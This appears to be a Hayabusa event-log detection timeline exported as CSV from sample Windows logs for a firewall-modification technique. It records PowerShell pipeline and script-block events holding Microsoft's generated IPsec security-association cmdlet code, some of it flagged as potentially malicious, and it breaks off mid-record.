Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.463 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.463 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeSA' -Alias '*' function Remove-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeSA') -and (@('ByAssociatedNetIPsecQuickModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeSA}, 'MSFT_NetSAAssociation', 'Dependent', 'Antecedent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByAssociatedNetIPsecQuickModeSA', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeSA' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.476 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.477 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.477 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.480 +00:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:45.499 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetQuickModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeSA') -and (@('ByAssociatedNetIPsecMainModeSA') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeSA}, 'MSFT_NetSAAssociation', 'Antecedent', 'Dependent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeSA.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeSA' -Alias '*' function Remove-NetIPsecQuickModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
